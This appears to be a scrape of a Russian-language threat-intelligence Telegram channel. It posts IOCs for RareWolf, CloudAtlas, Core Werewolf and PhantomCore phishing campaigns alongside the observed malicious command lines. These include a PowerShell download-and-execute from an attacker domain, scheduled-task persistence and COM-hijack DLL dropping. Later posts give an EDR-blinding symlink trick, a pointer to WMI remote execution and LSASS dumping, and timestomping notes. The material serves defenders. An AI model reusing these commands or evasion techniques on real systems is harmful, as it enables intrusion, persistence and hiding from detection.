Интересные доклады с BlackHat 2025 USA (еще не все презентации залили)
технический акт № 173.2025.rar
638641be461a114208f1269a71034cfae04dcfef3ba06e37ad850dd1d3fb2a6a
технический акт № 173.2025.scr (origname: 1nsxi.exe)
608315bccea4a96868c020d9441b0b6e6aa2525116b2abb25f1275f8ae296ad1
bazalt-vpk[.]site
4t-niagara[.]com (легитимный инсталятор проверяет обновления для себя)
https://bazalt-vpk[.]site/Chrom[.]rar - (архив с паролем, пароль видимо вшит в (1nsxi.exe)
Утверждено договор заказа и КП.scr
12a1a6cfc05a0841a6c684ec0edbe15353f77e6883eb8f8c94dd3b523b57a8d5
https://bazalt-vpk[.]site/Nvidia.rar
Без обозначения:
3af5f642623b35b3347dd3350c9736a7680d1272d2025e977a8ecf84915d34b7
344de5b82b337e49c0f30748e0bc74afc1ebcf90df4bd0eed5298b5cd57282d9
34e13de36b99cabf23fc95b59581ee7373b12325779aed86a0eb08f48ca48727
9dee1a0ba78bcd9d2480983c5c86cd16777cfe16d139cdba6e82bd0a5bed60d9
fcad1a8de33a347cc412a6c3825e83b4f5f0594aa0bc3279d1d3df62f684c0a6
1C Предприятие Платежное поручение.scr
21cd9edb74edb772dfb956cf5ad8e2fca1777793f0932bba9780982d09b63d6c
https://email-office[.]ru/pas.rar
https://email-office[.]ru/ChromeUpdate.rar
https://email-office[.]ru/bk.rar
Квитанция.scr
36d52d2878ac33d3619cfa6e82e8e1dfe8bcf3c8cde72d0ff3a9501ed01ece47
https://almaz-anley[.]site/mail.rar
исх.220 Р.В..scr
39e587fdba4060205e520a54fd498e5eb2d2945c0ded6217f28beb2e1410bdb5
https://bazalt-vpk[.]site/Intel.rar
C:\Nvidia\Trays\4t-min64.exe (этот самый легитимный инсталятор)
D7AF4E205E963B0C17330B7559CD7AA7BFABEE7E0F5F8A3F815CC2BB5F659201
C:\Nvidia\AnyDesk.exe
746475F67CD3456551C5CD9C6205C9754B2AEF17472AF1B40D41904DF2337A2B
C:\Nvidia\driver.exe
822B461A098187FDF116B0F8D2F97FB13319DE82A0BC015081011FCC3C25AB53
C:\Nvidia\fff.cmd
395B43CD60B1A40271123BB4CC0577B5B3EE308428E05F66A0A25E63AD130902
blat.exe
E613D07619B28F896B4ADF24D888CF52814FA2EB89F261F2E4715485954251B7
C:\Nvidia\~$ðòî÷êà_ïðåäïðèÿòèÿ (3).doc
CD22251250DE74F1C720FE2272CA751C0B395EBEE3EEBD9A73D6BD4A72C64113
C:\WINDOWS\system32\cmd.exe /c ""C:\Nvidia\fff.cmd"
"C:\Nvidia\AnyDesk.exe" --local-service
C:\Nvidia\Trays\Trays.exe -tray
C:\Nvidia\driver.exe x -r -ep2 -p"limpid2903392" C:\Nvidia\Chrom.rar C:\Nvidia\ /y
C:\Windows\System32\cmd.exe" /c echo>>C:\Nvidia\fff.cmd start C:\Nvidia\Trays\Trays.exe -tray
"C:\Windows\System32\cmd.exe" /c echo>>C:\Nvidia\fff.cmd C:\Nvidia\driver.exe x -r -ep2 -p"limpid2903392" C:\Nvidia\Chrom.rar C:\Nvidia\ /y
Энидеск обычный
Некоторые из IOS'S фигурируют в ранее опубликованных отчетах
#APT RareWolf
IOC'S FROM PHISHING
Также рарики bazalt-vpk (можно посмотреть постом выше)
Также рарики bazalt-vpk (можно посмотреть постом выше)
Пояснительная записка (испр).rar
SHA256:
d085de64ba3d2992657953025a3c2c9ea2996bd48d208cbbaef3f7fdbb4c01fa
9d71fa5455b2885825aa2be8832c771dd7cba9e633703d4ad24d9e2968b5ab59
Продолжаем хантить any run
#APT
#CloudAtlas
istochnik[.]org
Заявка_количество на поставку корпусов АО АМЗ.pdf.lnk
Счет_a19af3ed-a30a-45a0-b88d-6529f94398d4.pdf.lnk
2e7871b4cad8c77c1b7d7d430195470ee89ee15429ec3f32009d904e564595c6
81f26d8ad99ab743f97bfbaae0f260ef6d96b3b9eab2613622e6b0bd0032709e
2ad7e07a86784f22bc0fa400f433fc905aa49506b1cb629192d3c0b718cae372
d2d77c457dffd42942098f57b80a1e557879d4706d5bb96fd69c5896edfb60ea
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w Minimized -ep Bypass -nop -c "ieX(irm hxxps://istochnik.org/male-infertility/isoflor -UserAgent 'Mozilla/4.0 (compatible; Windows NT 10.0; ms-office; MSOffice 16)') "
#APT
#CloudAtlas
APT Core Werewolf
#CoreWerewolf
areanc.info
45.128.148.246
WinVNC.exe
f7d4080ad8259b0aac2504f8b5d8fab18e5124321c442c8bcb577598059d0b24
Transmartian.rar
b49e9759e529158aff7d81081f0f5242bc741873fb0fe414b475c4b6c83360ee
reflexiveness.exe
1ae5b8e4ba349292edf062d4173d8ebf25701b7b540eb2509b165fd219a0d4e7
LEnfant.rar
5f225c7f9f81d78b2ee45ec1eeb305d009631748bb2537b3376d7cd3390ad811
metroliners.cmd
2b5da54a8a94dd15dd7a5d53bf17d8df7856154fc9b20160867efe29a7c0501a
camass.bat
560404f3b5ffc52db8260b29dc3716e510261191f0a68152729c0387c376919b
tonguetaw
9448D1A7EAC7112EC68964EABC71134B14727BEC3C13882D8B1C869C5DC3A8F7
solehappy.bat
3bb64031a9f2be48b427fa143e0b3f7f12f032470f0d3a8e433692c43642e966
Документ приманка
542dc17c81ee391cf3db3afe41aac02ba31ec1fc56a3ec093ace7800b895bc64
TTP
"C:\Users\admin\AppData\Local\Temp\\intracoelomic.exe" e C:\Users\admin\AppData\Local\Temp\\Transmartian.rar -o C:\Users\admin\AppData\Local\Temp\ -pKKGEAP5SVMZ -y
"cmd" /c start "" "C:\Users\admin\AppData\Local\Temp\\Отсканированые документы - по ВСО заключение по запросу на начальника службы бпла - копия-1 (4).pdf" & C:\Users\admin\AppData\Local\Temp\\metroliners.cmd
C:\Users\admin\AppData\Local\Temp\intracoelomic.exe e C:\Users\admin\AppData\Local\Temp\LEnfant.rar -o C:\Users\Public\Downloads\ -pKKGEAP5SVMZ -y
C:\WINDOWS\System32\conhost.exe --headless powershell -ExecutionPolicy Bypass -Command "& { $chitchatted = New-Object -ComObject Schedule.Service; $chitchatted.Connect(); $Barnabe = $chitchatted.GetFolder('\'); $nectarise = $chitchatted.NewTask(0); $nectarise.Settings.Enabled = $true; $nectarise.Settings.StopIfGoingOnBatteries = $false; $nectarise.Settings.DisallowStartIfOnBatteries = $false; $nectarise.Settings.AllowDemandStart = $true; $atticists = $nectarise.Triggers.Create(2); $atticists.StartBoundary = ('2023-03-27T07:45:55'); $atticists.Repetition.Interval = 'PT11M'; $atticists.Repetition.Duration = 'P1D'; $Ganymeda = $nectarise.Actions.Create(0); $Ganymeda.Path = 'C:\WINDOWS\System32\conhost.exe'; $Ganymeda.Arguments = '--headless C:\Users\Public\Downloads\camass.bat'; $Barnabe.RegisterTaskDefinition('UsbDefault-Notification-UDNP-25852kf25383-25293i', $nectarise, 6, $null, $null, 3); }"
#CoreWerewolf
APT Core Werewolf
#CoreWerewolf
madebysbk.com
193.238.152.128
subbasaltic.rar
179831492da2ed8d9771e5a1fce4615deb0618d6977bd2a5953ebe67352df890
ejective.rar
49405126b9734d1784a0f4a49f3ddc28b5945c53e1079f83cc026de6f107c8b1
tassellus.cmd
b05e25dc7da1139d8731ca282572799168666708f8eb7201edd38999ea3db0b2
sorgho.bat
864f3bc5fc80ebb58c69f7715875742a0d7746ff4cef79d4031f061262e46fd1
Hasmonean.bat
081c65e07fe4958078ba7b09050fdb3fb8cbd1d59c91bd5d8147057c4c21c1b5
Clockville.exe
c868049d2cce5a00a0e7a72620d9e77e289a394fc7e8def67508273f1c614240
TTP
"C:\Users\admin\AppData\Local\Temp\\angilo.exe" e C:\Users\admin\AppData\Local\Temp\\subbasaltic.rar -o C:\Users\admin\AppData\Local\Temp\ -pr7vwjMN2Npq -y
C:\Users\admin\AppData\Local\Temp\angilo.exe e C:\Users\admin\AppData\Local\Temp\ejective.rar -o C:\Users\Public\Downloads\ -pr7vwjMN2Npq -y
C:\WINDOWS\System32\conhost.exe --headless powershell -ExecutionPolicy Bypass -Command "& { $nucule = New-Object -ComObject Schedule.Service; $nucule.Connect(); $scorchers = $nucule.GetFolder('\'); $unconformed = $nucule.NewTask(0); $unconformed.Settings.Enabled = $true; $unconformed.Settings.StopIfGoingOnBatteries = $false; $unconformed.Settings.DisallowStartIfOnBatteries = $false; $unconformed.Settings.AllowDemandStart = $true; $darkeners = $unconformed.Triggers.Create(2); $darkeners.StartBoundary = ('2023-03-27T07:45:55'); $darkeners.Repetition.Interval = 'PT11M'; $darkeners.Repetition.Duration = 'P1D'; $tjaele = $unconformed.Actions.Create(0); $tjaele.Path = 'C:\WINDOWS\System32\conhost.exe'; $tjaele.Arguments = '--headless C:\Users\Public\Downloads\sorgho.bat'; $scorchers.RegisterTaskDefinition('RtkAudUService64_BG-25740ld25025-25362m', $unconformed, 6, $null, $null, 3); }"
#CoreWerewolf
IOC'S
Отправитель: mtk.kr@inbox[.]ru
195.2.78[.]133
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.rar
8722D5B97208398B93D7B2DB8C65818CD43D93A68E11E220A889E8270E628BD1
Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа проектов к проектам.exe
6B290953441B1C53F63F98863AAE75BD8EA32996AB07976E498BAD111D535252
IOC'S FROM TI
Сигнатура по трафику:
ET MALWARE Rainbow Hyena Backdoor PhantomRemote (poll) C2 Traffic
#PhantomCore
Задание_на_оценку_N_2046_от_05_августа_2025_года[.]zip
SHA256: 66dd68177a5b31159579cfcab558771097d753a17b63c1cbf4dadc2f5c4f0e2e
Задание_на_оценку_N_2046_от_05_августа_2025_года.pdf.lnk
SHA256: B9579E65E5499BE393CF182496103941A006479FF8B41C0AD3B57B1D678D9794
Вредонос: winnt64_.dll (PhantomRemote)
SHA256: D585AA73D28AF621ABCEF44AE024FDE62366C29F5730A3CB31FF3C8BB5EB84A8
Сигнатура по трафику:
ET MALWARE Rainbow Hyena Backdoor PhantomRemote (poll) C2 Traffic
31.58.171[.]246
#PhantomCore
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}else{$f=$(gci -Path $env:USERPROFILE -Recurse -File|where{$_.Name -like 'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip'}|select -First 1); if($f){$r=$f.FullName;[System.IO.File]::WriteAllBytes('C:\ProgramData\winnt64_.dll',([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}};if(-Not (Test-Path $r)){$r=$(gci -Path $env.TEMP -Recurse -File|where {$_.Name -like 'Задание_на_оценку_N_2046_от_05_августа_2025_года.zip'}|select -First 1).FullName};[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:TEMP,'C:\sponge-bob\exe-zip-injector\Задание_на_оценку_N_2046_от_05_августа_2025_года.pdf'),([System.IO.File]::ReadAllBytes($r)|select -Skip 642064 -First 225723));start $([System.IO.Path]::Combine($env:TEMP, 'C:\sponge-bob\exe-zip-injector\Задание_на_оценку_N_2046_от_05_августа_2025_года.pdf'));#PhantomCore
IOC'S FROM TI
IP-адреса различные, но все висят на AS 56971 ( Cgi Global Limited исходя из данных VT)
Также одинаково название dll, его расположение, и способ закрепления.
#PhantomCore
i.getmantsev@orenklip[.]ru
Заказ_на_ДПЭ_225.zip
SHA256: 5265332860D0C81A5687F75D836441E5E1F45EB98E6DEA6E3D8830D70C97783A
Заказ_на_ДПЭ_225.pdf.lnk
SHA256: D9EADCBAB4703094481EF388F4F639223D66FFA42EBD4DA1037AA79B5BF87C4A
C:\ProgramData\winnt64_.dll
SHA256: 3FB7F5B2504386EAB868C6C4001E08787F13F3D915D1F25876C9192266A67549
C2
31.57.61[.]137
IP-адреса различные, но все висят на AS 56971 ( Cgi Global Limited исходя из данных VT)
Также одинаково название dll, его расположение, и способ закрепления.
#PhantomCore
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -c "New-Item -Path 'HKCU:\Software\Classes\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InprocServer32' -Force|Set-Item -Value 'C:\ProgramData\winnt64_.dll';$r=[System.IO.Path]::Combine($(gl).Path,'Заказ_на_ДПЭ_225.zip');if(Test-Path $r){[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:ProgramData,'winnt64_.dll'),([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}else{$f=$(gci -Path $env:USERPROFILE -Recurse -File|where{$_.Name -like 'Заказ_на_ДПЭ_225.zip'}|select -First 1); if($f){$r=$f.FullName;[System.IO.File]::WriteAllBytes('C:\ProgramData\winnt64_.dll',([System.IO.File]::ReadAllBytes($r)|select -Skip 16 -First 642064));}};if(-Not (Test-Path $r)){$r=$(gci -Path $env.TEMP -Recurse -File|where {$_.Name -like 'Заказ_на_ДПЭ_225.zip'}|select -First 1).FullName};[System.IO.File]::WriteAllBytes([System.IO.Path]::Combine($env:TEMP,'C:\sponge-bob\exe-zip-injector\Заказ_на_ДПЭ_225.pdf'),([System.IO.File]::ReadAllBytes($r)|select -Skip 642064 -First 704747));start $([System.IO.Path]::Combine($env:TEMP, 'C:\sponge-bob\exe-zip-injector\Заказ_на_ДПЭ_225.pdf'));
#PhantomCore
Хэши новые домен известный ранее.
#APT RareWolf
Пакет документов по Дополнительному соглашению к Договору №513402-2025.rar
EAEEDFE9958399F220A0EC793135EA96880D47E8AA0EDF271623A55A9DF79A05
Калькуляция.xlsx
4734444DE2B506360FAF17B1348DADAA07C1CB3734866AE23705D4C8AFDE4D22
Документы по Дополнительному соглашению к Договору №513402-2025.scr
C2A856E66469F64DCD3351B56AD1C61D0DB0488C7248BC3C05DF2EDF7E212BE2
email-office[.]ru
#APT RareWolf
IOC'S
Уведомление №221 о начале комплексной проверки согласно плану утечек8.exe
autovekb96[.]ru
82f5e455ebce674b4382bf2e7d0c58d67a11af3f861ea4ee1c431013d5ffe85e
Как за пару кнопок убить AV/EDR (разных цветов)
Из требований:
- Наличие прав админа на тачке;
- Возможность доставки procmon.
А далее всё более чем прозаично.
1. Включение функции "EnableBootLooging";
2. Создание символической ссылки:
3. Ребут тачки.
Получаем магию.
Подробнее:
https://www.zerosalarium.com/2025/01/byovd%20next%20level%20blind%20EDR%20windows%20symbolic%20link.html?m=1
Из требований:
- Наличие прав админа на тачке;
- Возможность доставки procmon.
А далее всё более чем прозаично.
1. Включение функции "EnableBootLooging";
2. Создание символической ссылки:
mklink C:\Windows\Procmon.pmb "<Полный путь до файла который требуется перезаписать>"
3. Ребут тачки.
Получаем магию.
Подробнее:
https://www.zerosalarium.com/2025/01/byovd%20next%20level%20blind%20EDR%20windows%20symbolic%20link.html?m=1
Forwarded from 1N73LL1G3NC3
Win32_Process has been the go to WMI class for remote command execution for years. In this post we will cover a new WMI class that functions like Win32_Process and offers further capability.
🔗 WMI_Proc_Dump.py
Dump processes over WMI with MSFT_MTProcess
🔗 mtprocess.py
Python script that uses Impacket to use the MSFT_MTProcess WMI class to execute a command. If wanting to use against a Workstation it can install the provider.
P.S. One more way to dump LSASS.
Please open Telegram to view this post
VIEW IN TELEGRAM
Сегодня немножечко про обновление временныхметок в NTFS.
Временные метки $STANDART_INFORMATION (0x10), возможно спокойно изменить, через Powershell из пространства пользователя. Изменение временных меток $FILE_NAME (0x30) происходит на уровне ядра. В случае, если при Timestomping изменить только временные метки $STANDART_INFORMATION (0x10), то будет заметно явное расхождение временных меток при анализе $MFT.
Однако, есть достаточно простые варианты синхронизации временных меток $SI с $FN.
1) Переименование файла;
2) Перемещение файла в другую директорию (однако тут ещё надо менять временные метки самой папки, поэтому такой себе вариант).
На скриншотах 1,2 временные метки создания файла для $SI и $FN, на 3,4 видно расхождение временных меток $SI и $FN после Timestomping. На скриншотах 5,6 видно, что при переименовании файла временные метки синхронизировались.
Да, в данном случае всё равно существуют альтернативные артефакты с помощью которых можно выявить Timestomping, но всё равно это несколько усложняет анализ.
#FORENSIC
Временные метки $STANDART_INFORMATION (0x10), возможно спокойно изменить, через Powershell из пространства пользователя. Изменение временных меток $FILE_NAME (0x30) происходит на уровне ядра. В случае, если при Timestomping изменить только временные метки $STANDART_INFORMATION (0x10), то будет заметно явное расхождение временных меток при анализе $MFT.
Однако, есть достаточно простые варианты синхронизации временных меток $SI с $FN.
1) Переименование файла;
2) Перемещение файла в другую директорию (однако тут ещё надо менять временные метки самой папки, поэтому такой себе вариант).
На скриншотах 1,2 временные метки создания файла для $SI и $FN, на 3,4 видно расхождение временных меток $SI и $FN после Timestomping. На скриншотах 5,6 видно, что при переименовании файла временные метки синхронизировались.
Да, в данном случае всё равно существуют альтернативные артефакты с помощью которых можно выявить Timestomping, но всё равно это несколько усложняет анализ.
#FORENSIC
5